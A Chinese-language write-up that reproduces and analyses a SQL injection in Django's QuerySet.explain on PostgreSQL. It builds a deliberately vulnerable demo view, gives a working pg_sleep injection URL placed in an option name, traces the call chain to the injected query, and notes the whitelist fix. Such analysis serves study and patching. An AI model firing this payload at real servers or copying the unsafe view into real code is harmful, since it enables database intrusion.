漏洞簡介
在Django 2.2 的 2.2.28 之前版本、3.2 的 3.2.13 之前版本和 4.0 的 4.0.4 之前版本中的 QuerySet.deexplain 中發現了SQL注入問題。這是通過傳遞一個精心編制的字典(帶有字典擴展)作為**options參數來實現的,并將注入負載放置在選項名稱中。
影響版本
2.2 =< Django < 2.2.28
3.2 =< Django < 3.2.13
4.0 =< Django < 4.0.4
環境搭建
創建存在 漏洞 Django 版本 3.2.12 項目
創建 startApp Demo 并依次修改文件
安裝 postgresql 數據庫
settings.py 設置連接數據庫為 postgresql 數據庫
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql',
'NAME': 'test',
'USER': 'postgres',
'PASSword': '123456',
'HOST': '127.0.0.1',
'PORT': '5432',
}
}
urls.py 設定對應路由
fromdjango.contrib importadmin
fromdjango.urls importpath
fromDemo importviews
urlpatterns = [
path( 'admin/', admin.site.urls),
path( 'index/', views.index),
path( 'demo/', views.users),
path( 'initialize/', views.loadexampledata),
]
models.py
fromdjango.db importmodels
# Create your models here.
classUser(models.Model):
name = models.CharField(max_length= 200)
def__str__(self):
returnself.name
views.py
importjson
fromdjango.http importHttpResponse
fromdjango.shortcuts importrender
# Create your views here.
from.models importUser
defindex(request):
returnHttpResponse( 'hello world')
defusers(request):
query = request.GET.get( 'q')
query = json.loads(query)
qs = User.objects.get_queryset.explain(**query)
returnHttpResponse(qs)
defloadexampledata(request):
u = User(name= "Admin")
u.save
u = User(name= "Staff1")
u.save
u = User(name= "Staff12")
u.save
returnHttpResponse( "ok") 漏洞復現 http:// 127.0.0.1: 8000/demo/?q={ "ANALYZE)+select+pg_sleep(5);--+": "aaa"}
發現成功構造使得服務器沉睡
漏洞分析
在進行代碼分析之前,我們先了解一個知識點 EXPLAIN
EXPLAIN
EXPLAIN -- 顯示一個語句的執行計劃
image
EXPLAIN [ ( option [, ...] ) ] statement
EXPLAIN [ ANALYZE ] [ VERBOSE ] statement
option:
ANALYZE [ boolean ] 執行命令并顯示實際運行時間
VERBOSE [ boolean ] 顯示規劃樹完整的內部表現形式,而不僅是一個摘要
COSTS [ boolean ]
BUFFERS [ boolean ]
TIMING [ boolean ]
FORMAT { TEXT | XML | JSON | YAML }
statement:
查詢執行計劃的 SQL 語句,可以是任何 select、insert、update、delete、values、execute、declare 語句
EXPLAIN ANALYZE不僅會顯示查詢計劃,還會實際運行語句。EXPLAIN ANALYZE會丟掉任何來自SELECT語句的輸出,但是該語句中的其他操作會被執行(例如INSERT、UPDATE或者DELETE)。
調試分析
django.db.models.query.QuerySet.explain
django.db.models.sql.query.Query.explain
django.db.models.sql.compiler.SQLCompiler.explain_query
django.db.models.sql.compiler.SQLCompiler.execute_sql
django.db.models.sql.compiler.SQLCompiler.as_sql
在這里會根據所選擇的數據庫,來調用其相對應的 explain_query_prefix 方法
django.db.backends.postgresql.operations.Databaseoperations.explain_query_prefix
postgresql 中 重寫了 explain_query_prefix 方法將鍵名拼接到了 SQL 語句中
最后執行的 SQL 語句是
'EXPLAIN (ANALYZE) SELECT PG_SLEEP(5);-- true) SELECT "Demo_user"."id", "Demo_user"."name" FROM "Demo_user"'
漏洞修復
做了一個過濾,發現危險字符就拋出異常
只有字符串在白名單內才會拼接到語句中